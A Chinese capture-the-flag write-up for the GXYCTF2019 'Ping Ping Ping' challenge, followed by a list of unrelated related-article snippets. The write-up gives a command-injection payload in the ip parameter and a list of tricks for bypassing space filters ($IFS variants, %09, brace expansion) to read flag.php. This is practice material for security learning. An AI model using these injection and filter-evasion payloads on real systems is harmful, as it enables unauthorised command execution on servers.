[GXYCTF2019]Ping Ping Ping 1

时间：2022-09-05 16:55:34浏览次数：70

标签：IFS Ping cat 空格 flag php GXYCTF2019

进入页面发现提示

应该是命令执行
可以使用| & ；等方法绕过
尝试查看当前目录下的文件

?ip=127.0.0.1|ls

发现拥有flag.php和index.php两个文件

尝试使用cat查看flag.php的内容

这里看到空格被过滤了，去网上找了很多绕过空格的方法，总结一下

$IFS
${IFS}
$IFS$1
$IFS$2 ... $IFS$9
<
<>
{cat flag.php}
%20
%09
%0a
ca\t fla\g.php

类似cat查看文件内容的命令有

cat
tac  反向查看
more
less

回过来，经过尝试，可以使用$IFS$1这种方法绕过空格

但是有提示不可以使用flag关键字

标签：IFS,Ping,cat,空格,flag,php,GXYCTF2019
From： https://www.cnblogs.com/Junglezt/p/16658724.html

Flipping and Bonus
ProblemStatementTakahashiwilltossacoin$N$times.Healsohasacounter,whichinitiallyshows$0$.Dependingontheresultofthe$i$-thcointoss,thef......
ping命令显示的TTL是什么意思
ping命令显示的TTL是什么意思_Jack2013tong的博客-CSDN博客_ping设置ttl https://blog.csdn.net/huwei2003/article/details/53113874如下ping的结果C:\>ping192.168......
关于ping以及TTL的分析
ping[目标]的意思就是向目标发送几个数据包，之后如果目标接受到一个数据包，那么目标就会向发送ping的主机返回一个数据包比如上图，我ping了百度的服务器（windows下默认ping......
CF1513 E Cost Equilibrium / F Swapping Problem
E先做差，发现排列如果出现正负正负或负正负正就会挂，调整一下匹配即可使min变大同时如果正和负都>1，则不存在中间一段左右两段其他的，这样也会挂然后随便组合一下F手玩发......
【基础整理】Mapping representation 机器人所用地图种类及相关介绍
参考与前言本文主要介绍建图Mapping方面的一些基础知识介绍与相关下游任务使用涉及知识较为基础，SLAM大佬们可以提前退出了主要针对应用为移动机器人与物流无人驾驶......
@RequestMapping注解详解
功能RequestMapping注解是一个用来处理请求地址映射的注解，可用于类或方法的上方，用于类的上方可以作为父路径value属性 @RequestMapping(value={"/index","/hello"})p......
ping 常用小技巧
ping打印时间戳：Macos、Linux #ping打印时间戳pingbaidu.com|awk'{printstrftime("%Y-%m-%d%H:%M:%S",systime()),$0}'ping不中断情况下看ping统计......
「postOI」Cross Swapping
题意给出一个$n\timesn$的矩阵$A$，你可以进行下述操作任意多次：指定整数$k$（$1\lek\len$），使$A_{ni}$与$A_{in}$交换。求你能得到的字典序最小的矩阵......
re | [GXYCTF2019]minecraft
[GXYCTF2019]minecraft闲得无聊，找个题练练手。提示是使用了boost库的hash，给了exe和dll，都是64位的，dll导出了一个函数，就是加密和对比用的。基本格局如下：主函数：dll：d......
springMVC RequestMapping
1.可以加在类上用于模块2.可以加在方法上用于路径 packagecom.cj.mvc.controller;importorg.springframework.stereotype.Controller;importorg.springframew......

[GXYCTF2019]Ping Ping Ping 1

相关文章

赞助商

阅读排行